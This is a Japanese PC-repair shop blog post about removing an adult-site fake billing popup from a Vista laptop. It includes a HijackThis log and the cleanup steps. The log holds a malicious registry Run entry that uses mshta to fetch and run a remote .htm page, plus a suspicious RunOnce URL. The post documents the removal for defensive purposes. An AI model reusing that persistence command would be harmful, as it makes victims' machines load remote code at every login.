« DELL Inspiron 530 電源が入らない。 | トップページ | 東芝 RECZA PC D732 無線LAN接続設定とカスペルスキーインストール設定。 »

2012年10月20日 (土)

アダルトサイトの請求画面削除依頼。

本日のトラブルはタイトル通りでアダルトサイトの請求画面の削除作業です。

Oqmgnxceslrcythz ※画像はサンプルです。今回のものではありません。

問題のパソコンはシャープのメビウス 型番は忘れましたがWindowsVistaです。

基本的にこの作業はお客様との対面修理となりますので時間優先の為、写真は一切ありませんのでご了承下さい。

さて早速電源を入れて確認してみると確かに画面の真ん中に請求画面が起動してきました。

最近のはhtaファイルタイプのがほとんどです。

まずはHijackThisでログを採取。

R3 - URLSearchHook: MyUrlSearchHook Class - {2ACECADE-0BC7-4C6F-95CF-A221CC161B52} - C:\PROGRA~1\JWord\Plugin2\jwdsrch.dll
O1 - Hosts: ::1 localhost
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Yahoo!ツールバーフィッシング警告 - {1F68E72C-50E5-44B8-8F56-6A54D3AF1DA4} - C:\Program Files\Yahoo!J\Toolbar\7_3_0_15\Modules\ypho.dll
O2 - BHO: FlpLauncher Class - {4401FDC3-7996-4774-8D2B-C1AE9CD6CC25} - C:\Program Files\E-Book Systems\FlipViewer\fplaunch.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\5.6.5612.1312\swg.dll
O2 - BHO: Google Dictionary Compression sdch - {C84D72FE-E17D-4195-BB24-76C02E2E7C4E} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_B7C5AC242193BB3E.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: Yahoo!ツールバーヘルパー - {EEBA90E6-2B14-413F-9BF8-61A8BDF92258} - C:\Program Files\Yahoo!J\Toolbar\7_3_0_15\Modules\YahooToolBar.dll
O3 - Toolbar: &Liquid Surf - {B9F633F6-EA44-45F4-91EB-FABFC65A0634} - C:\Program Files\Portrait Displays\Liquid Surf\sybil.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll
O3 - Toolbar: Yahoo!ツールバー - {AEF44653-C059-42CB-A5B7-41C640DA4A67} - C:\Program Files\Yahoo!J\Toolbar\7_3_0_15\Modules\YahooToolBar.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [jwdsrch] C:\Program Files\JWord\Plugin2\jwdsrch.exe
O4 - HKLM\..\Run: [FlipViewer Library] "C:\Program Files\E-Book Systems\FlipViewer\FlipViewerLibrary.exe" /showmode=hide
O4 - HKLM\..\Run: [IME JPN 2007 Migration] C:\PROGRA~1\COMMON~1\MICROS~1\IME12\IMEJP\IMJPKLMG.EXE /Preload
O4 - HKLM\..\Run: [ypcsm] C:\PROGRA~1\Yahoo!J\PCSERV~1\ypcsm.exe
O4 - HKLM\..\Run: [AppleSyncNotifier] C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [StartCCC] C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [ypcsm] c:\progra~1\yahoo!j\pcserv~1\ypcsm.exe
O4 - HKCU\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
O4 - HKCU\..\Run: [OE] "C:\Program Files\Trend Micro\Virus Buster\TMAS_OE\TMAS_OEMon.exe"
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKCU\..\Run: [AnyDVD] "C:\Program Files\SlySoft\AnyDVD\AnyDVD.exe"
O4 - HKCU\..\Run: [urofane(keny)] "C:\Users\.....\AppData\Roaming\Roxio\keny.lnk"
O4 - HKCU\..\Run: [probabse39124_415175219] "C:\Windows\system32\mshta"http://b79a.turnsend.info/sg52zy/gBPh9aYVD5dDG9c~~GEvVQ.htm                O4 - HKCU\..\RunOnce: [Shockwave Updater] C:\Windows\system32\Adobe\Shockwave 11\SwHelper_1150596.exe -Update -1150596 -"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; YTB730"http://www.geocities.jp/mgameimg/sinki/86.dir">http://www.geocities.jp/mgameimg/sinki/86.dir"
O4 - Global Startup: JSクイックサーチファイル 自動更新.LNK = C:\JUST\JSLIB32\JSQSF32.EXE
O4 - Global Startup: JSクイックランチ.LNK = C:\JUST\JSLIB32\JSQLNCH.EXE
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre6\bin\npjpi160_30.dll
O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre6\bin\npjpi160_30.dll
O9 - Extra button: JWord プラグイン - {34D67ED2-C837-4627-838C-2264E347D291} - "http://www.jword.jp/intro/?(file missing)
O9 - Extra 'Tools' menuitem: JWord プラグインについて - {34D67ED2-C837-4627-838C-2264E347D291} -
http://www.jword.jp/intro/partner=AP&type=lk&frm=iebutton&pver=2
(file missing)
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL
O10 - Unknown file in Winsock LSP: c:\windows\system32\iflsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\iflsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\iflsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\iflsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\iflsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O11 - Options group: [JWDSearch]  JWord プラグイン
O13 - Gopher Prefix:
O15 - Trusted Zone:http://*.web.setup
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{71E46A5D-003A-4A69-8E28-174FD3E64CFF}: NameServer = 172.29.0.10
O17 - HKLM\System\CS1\Services\Tcpip\..\{71E46A5D-003A-4A69-8E28-174FD3E64CFF}: NameServer = 172.29.0.10
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Ati External Event Utility - ATI Technologies Inc. - C:\Windows\system32\Ati2evxx.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: getPlus(R) Helper - NOS Microsystems Ltd. - C:\Program Files\NOS\bin\getPlus_HelperSvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: IviRegMgr - InterVideo - C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe

ちょっと分かりづらいですが赤字の

O4 - HKCU\..\Run: [probabse39124_415175219] "C:\Windows\system32\mshta"http://b79a.turnsend.info/sg52zy/gBPh9aYVD5dDG9c~~GEvVQ.htm                

が改ざんされたレジストリです。

該当レジストリをFixで削除。

一度再起動して画面が表示されなくなった事を確認。

次に復元されないように「システムの復元」の復元ポイントを削除。

最後にタスクスケジューラを確認します。

以前ここにスケジュールされていてレジストリを削除しても再発してしまう事がありました。

今回は特に無さそうです。

しばらく待っても画面が表示されないことを確認して作業終了です。

アダルトサイト請求画面削除 ¥8,000-

人気blogランキングに登録しました。クリックご協力ください。

人気blogランキングへ

パソコン修理・トラブルサポートはPCRサービスまで!!

宅配修理もお受け致します。PCRサービス宅配修理サービス

お問合せはこちら

|

« DELL Inspiron 530 電源が入らない。 | トップページ | 東芝 RECZA PC D732 無線LAN接続設定とカスペルスキーインストール設定。 »

コメント

コメントを書く



(ウェブ上には掲載しません)


コメントは記事投稿者が公開するまで表示されません。



トラックバック


この記事へのトラックバック一覧です: アダルトサイトの請求画面削除依頼。:

« DELL Inspiron 530 電源が入らない。 | トップページ | 東芝 RECZA PC D732 無線LAN接続設定とカスペルスキーインストール設定。 »